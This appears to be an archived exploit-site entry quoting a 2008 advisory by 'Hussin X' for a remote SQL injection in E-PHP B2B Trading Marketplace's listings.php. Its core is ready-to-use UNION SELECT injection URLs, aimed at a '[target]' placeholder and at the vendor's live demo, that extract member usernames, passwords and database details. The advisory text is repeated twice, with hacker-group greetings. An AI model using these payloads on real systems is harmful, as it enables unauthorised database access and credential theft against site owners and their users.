Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: <a href="http://www.darkc0de.com/"; target="ext">http://www.darkc0de.com/.</a> Authored By <a href="mailto:r45c4l[at]hotmail.com";>r45c4l</a> On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote: > |___________________________________________________| > | > | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability > | > |___________________________________________________ > |---------------------Hussin X----------------------| > | > | Author: Hussin X > | > | Home : WwW.Hussin-X.CoM <http://www.hussin-x.com/> | www.tryag.cc/cc > | > | email: darkangel_g85[at]Yahoo[DoT]com > | > | > | > |___________________________________________________ > | | > | > | script : http://www.ephpscripts.com > | > |___________________________________________________| > > Exploit: > > > > www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > > > > > L!VE DEMO: : > > INFO > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > > > > > ____________________________( Greetz )_________________________________ > | > | All members of the Forum WwW.Hussin-X.CoM <http://www.hussin-x.com/> | > WwW.TrYaG.CC <http://www.tryag.cc/> > | > | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr > | > | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori > |______________________________________________________________________ > > > Im IRAQi > |___________________________________________________| > | > | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability > | > |___________________________________________________ > |---------------------Hussin X----------------------| > | > | Author: Hussin X > | > | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc > | > | email: darkangel_g85[at]Yahoo[DoT]com > | > | > | > |___________________________________________________ > | | > | > | script : http://www.ephpscripts.com > | > |___________________________________________________| > > Exploit: > > > > www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > > > > > L!VE DEMO: : > > INFO > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > > > > > ____________________________( Greetz )_________________________________ > | > | All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC > | > | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr > | > | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori > |______________________________________________________________________ > > > Im IRAQi
